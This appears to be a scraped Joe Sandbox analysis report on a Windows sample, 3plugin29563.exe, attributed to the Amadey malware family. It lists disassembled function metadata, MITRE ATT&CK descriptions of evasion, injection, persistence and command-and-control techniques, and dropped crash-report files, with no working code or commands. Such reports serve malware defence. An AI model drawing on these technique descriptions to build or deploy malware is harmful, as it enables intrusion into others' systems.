Opcode ID: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction ID: 8c8d9416c712e26177bbd7fe74d822bcc54e4b1b9b293b2ddf0e0ac058583908
Opcode Fuzzy Hash: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction Fuzzy Hash: 4801D431985A317AD52132355C03BAF22089B0D778F18322BFEE0A52E5FB9D8C6245DF

Function 00402440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00433AA1: RaiseException.KERNEL32(E06D7363,00000001,00000003,\$@,00416B17,8B18EC83,?,0040245C,?,0046005C), ref: 00433B01

___std_exception_copy.LIBVCRUNTIME ref: 0040247E

Strings

P#@, xrefs: 0040246D
P#@, xrefs: 00402486

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: P#@$P#@
API String ID: 3109751735-3974838576
Opcode ID: c47c2e9a077d21fb838c6e68d33cdb20a95f4624a233f68b0cb76e4381e9172f
Instruction ID: b20eb5a5b88c3717300c8379e309be929e7f674d1fae793633624c4917cafdcc
Opcode Fuzzy Hash: c47c2e9a077d21fb838c6e68d33cdb20a95f4624a233f68b0cb76e4381e9172f
Instruction Fuzzy Hash: BEF0A07681020C67C714EEE5E801986B3ACDA15705B108A2BFA40A7501F7B8FA488799

Function 0072E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0072E662,?,?,00727785,00727785,?), ref: 0072E41B
GetACP.KERNEL32(00000000,0072E662,?,?,00727785,00727785,?), ref: 0072E432

Strings

br, xrefs: 0072E3F8, 0072E455

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: br
API String ID: 0-2326723478
Opcode ID: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
Instruction ID: ec90f8bbf8e0e943b1827d5ffb5a6942b449a47136bc7fcc5e15a533cae69403
Opcode Fuzzy Hash: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
Instruction Fuzzy Hash: DFF09630A042519FDB10FB64F85876C7771AB00339F244398F535C61F1D7B59941C746

Function 0070D31A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465720), ref: 0070D325
RtlLeaveCriticalSection.NTDLL(00465720), ref: 0070D362

Strings

WF, xrefs: 0070D31F

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: WF
API String ID: 3168844106-2907287748
Opcode ID: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
Instruction ID: 1bdac3d26a94ec955f16a2b465fec733f4e2ded10dc792c487cbc26294fe5784
Opcode Fuzzy Hash: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
Instruction Fuzzy Hash: 83F08239500701DFC7245F99DD44A2AB7E4EB85731F10032DE955976E0D7795C42CA1B

Function 00402520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402552

Strings

P#@, xrefs: 00402547
P#@, xrefs: 0040255D

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: 3098a5abb4a430e8c046baabfb0c04881eb0a2bcf26c109f2e7b1c6565ea2582
Instruction ID: 8ab1ead64319f94712381e01b4aadf11cded658978a0eec3110c4f74897e1d72
Opcode Fuzzy Hash: 3098a5abb4a430e8c046baabfb0c04881eb0a2bcf26c109f2e7b1c6565ea2582
Instruction Fuzzy Hash: 91F0A771D1020CABCB14DFA8D8419CEBBF8AF59304F10C6AFF84467201EB745A58CB99

Function 00712551 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007124FC
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00712512

Part of subcall function 00712A39: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00712A48
Part of subcall function 00712A39: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00712A5C
Part of subcall function 00712A39: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00712A7D
Part of subcall function 00712A39: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00712AE6
Part of subcall function 00712A39: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00712C54

Strings

@[F, xrefs: 0071250A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
String ID: @[F
API String ID: 3302332639-1227568360
Opcode ID: 08faf06a7c6f408d1ec28e98f8d504dc4d96ef49664ff1e04ac04630f0c929db
Instruction ID: be492dbd329e0c054601d4b2864532cab22b18f66b47d588e60a47fb767a1731
Opcode Fuzzy Hash: 08faf06a7c6f408d1ec28e98f8d504dc4d96ef49664ff1e04ac04630f0c929db
Instruction Fuzzy Hash: EDE01AB0604706C7DB34AFE9AAA97A973A8AB14704F404169E5048E2C2EBFCD8514A4A

Function 004024A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004024BE

Strings

P#@, xrefs: 004024AD
P#@, xrefs: 004024C6

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: 935341e7c896eaab84a17bb68f1bb2dcfbcd899ec3bee088e06fae5cbe6bcff5
Instruction ID: a93222f481a6019ed4d8fa60bd7b225b6999ca82aecbe3f19b40470c2db33733
Opcode Fuzzy Hash: 935341e7c896eaab84a17bb68f1bb2dcfbcd899ec3bee088e06fae5cbe6bcff5
Instruction Fuzzy Hash: BCD0127292031967C610DF99D801842B7DC9E19755714C52BF944E7201F774E9948BA8

Function 00402580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040259E

Strings

P#@, xrefs: 0040258D
P#@, xrefs: 004025A6

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: ab940b20c8ed4a98533d3a74a5263d2a66ea42a0145a63cbe993f6b16d60fe77
Instruction ID: 81de4a9180bd6130f8c8d58fcb8d9d47f81d3a28709e16a09cdbb0bc19c0fbf8
Opcode Fuzzy Hash: ab940b20c8ed4a98533d3a74a5263d2a66ea42a0145a63cbe993f6b16d60fe77
Instruction Fuzzy Hash: 17D02B7292030867C710DF99CC00842B7DCDE19715710C92BF944E7201F370E8948BE8

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3plugin29563.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_24d5fca43d372419e7b148d8e0f619ddefa25f40_50c3897d_05546f1e-fda7-4b33-a979-93587c271247\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_1ca7f69b-d1d9-4d09-a9a8-22c64161a46f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_78a1c072-59fe-4f95-a73d-5b4ad6421e45\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_793b0982-9c02-4be3-8727-374fe874914b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_7d8a3dd5-e412-4b8d-879d-666e77a1bbf9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_a5e85787-b950-4f2a-8812-eb73aedca52f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_a7b1fa16-4ca5-41de-a8c2-a5607192858e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_c2412d70-be80-4c20-babe-885fc4666691\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_edc5663c-07c9-4714-988c-ab0a0ffabbfe\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_aed538d3da111a25df1621c29ce9435f71165_50c3897d_f4576c93-dc97-4cb8-964e-4b6f7cec5a13\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_00157438-aa38-4f1f-8622-7ba3dfdcca08\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_3c380e22-e241-43a1-aad6-e99afce7738f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_4c7ebbfd-7867-4fd6-bea4-90c11f497f28\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_851f73fb-58f1-4d29-b334-7b97668563bb\Report.wer

Windows Analysis Report
3plugin29563.exe